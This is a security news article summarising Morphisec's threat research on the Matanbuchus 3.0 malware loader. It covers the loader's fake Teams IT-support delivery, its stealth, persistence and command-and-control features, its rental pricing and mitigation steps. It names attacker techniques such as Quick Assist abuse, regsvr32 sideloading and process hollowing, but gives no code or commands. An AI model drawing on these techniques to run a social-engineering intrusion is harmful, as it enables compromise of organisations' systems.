Matanbuchus 3.0 Emerges To Facilitate Ransomware Infections

Cybersecurity experts at Morphisec report that Matanbuchus, launched as malware-as-a-service (MaaS) in 2021, has returned with an upgraded and powerful new version, Matanbuchus 3.0. The malware lets attackers rent a powerful loader that can install additional malicious tools on Windows computers, acting as a sophisticated malware loader for hire.

In mid‑July 2025, attackers released Matanbuchus 3.0, an upgraded version featuring stronger stealth, persistence, and delivery tactics. Morphisec warns that this update poses a heightened threat to enterprises and government departments.

Attackers initiate the infection through social engineering. Recently, they placed fake Microsoft Teams calls pretending to be IT support. During the call, they persuaded an employee to launch Quick Assist and run a PowerShell command to download code. That command fetched a ZIP file containing a modified Notepad++ updater ("GenericUpdater.exe"), a custom XML, and a malicious DLL with the Matanbuchus loader.

Morphisec CTO Michael Gorelik explained that victims are carefully targeted and persuaded to execute a script that triggers the download of a malicious archive containing the renamed updater and malicious loader.

Once loaded, Matanbuchus 3.0 begins gathering system details like running processes, installed apps, Windows hotfixes, and security tools. Depending on the version, it disguises its communications as regular traffic by clustering them under a Skype-like user agent and using encrypted C2 channels, HTTP, or DNS.

For persistence, it sideloads the DLL via regsvr32, creates scheduled tasks through COM manipulation, and injects shell code to ensure it starts on reboot. It also renames and relocates files using a serial-ID algorithm based on registry and volume data.

Matanbuchus 3.0's New Features

This version introduced several new capabilities:

• In-memory execution to avoid writing to disk
• Stronger obfuscation and encryption (e.g., using Salsa20 instead of older methods)
• Support for WQL queries to fetch security configurations
• CMD and PowerShell reverse shells
• Execution of EXE, DLL, MSI, or shell code payloads
• Techniques like process hollowing via MSIExec
• Indirect system calls and anti-sandbox checks (e.g., Russian-language filtering, WOW64 detection)

Gorelik noted,

The Matanbuchus 3.0 Malware-as-a-Service has evolved into a sophisticated threat. This updated version introduces advanced techniques such as improved communication protocols, in-memory stealth, enhanced obfuscation, and support for WQL queries, CMD, and PowerShell reverse shells. It collects detailed system data, including EDR security controls, to tailor subsequent attacks, which may culminate in ransomware deployment. The loader's ability to execute regsvr32, rundll32, msiexec, or process hollowing commands underscores its versatility, making it a significant risk to compromised systems.

Matanbuchus 3.0 is expensive. The HTTP-based version rents for 10,000 USD per month, while the more covert DNS-based version costs 15,000 USD per month. As DarkReading's Nate Nelson noted, the DNS version offers extra stealth and resists simple blocking, supporting smaller data packets for commands rather than full binaries.

Typically, a Matanbuchus 3.0 attack begins with a social engineering campaign. A fake Microsoft Teams call masquerading as IT support tricks the user into running Quick Assist and a PowerShell script. The victim then downloads an archive with a deceptively labeled Notepad++ updater and loader DLL.

Once the updater and loader are installed, the malware collects system and security info to tailor its actions. The malware sends data to and awaits instructions from a command-and-control server, over HTTP or DNS encrypted channels. If the correct instructions are received, the malware installs one or more payloads, including additional malware, a reverse shell, or ransomware. The malware maintains persistence by using living-off-the-land tools, scheduled tasks, shell code, and code obfuscation.

DarkReading referred to Matanbuchus as "the Rolls‑Royce of malware loaders," stressing its elite features and focus on high-value targets over mass infections. Matanbuchus can present a significant threat to both enterprises and government departments, given the following factors:

• Widespread Teams use: Many organizations rely on Teams for daily work, making it an ideal attack vector.
• In-memory stealth: Since payloads don't touch the disk, traditional antivirus and EDR tools may miss them.
• LOLBins help hide activity: Using native Windows tools makes detection significantly harder.
• MaaS lowers skill barriers: Attackers can deploy fearsome tools without technical skills or custom development.

Morphisec's analysis reveals Matanbuchus 3.0 as a polished and fearsome MaaS loader. Combining social engineering via trusted channels, in-memory execution, and obfuscation, abuse of legitimate Windows tools (LOLBins), sophisticated persistence and communication techniques, and resilient, hard-to-detect malware. Matanbuchus 3.0 is a much-improved threat that needs to be taken seriously.

Morphisec advises organizations and users to take these concrete steps to help mitigate and prevent Matanbuchus infection:

• Educate staff to be skeptical of unexpected external Teams calls—even if they originate from familiar names.
• Restrict Quick Assist usage with strict permissions and monitoring.
• Monitor logs for unusual use of regsvr32, rundll32, msiexec, scheduled tasks, and COM objects.
• Use in-memory malware detection tools that can inspect runtime behavior.
• Enforce strict download policies: only allow signed installers from trusted sources.
• Regularly patch systems and EDR agents to close vulnerabilities.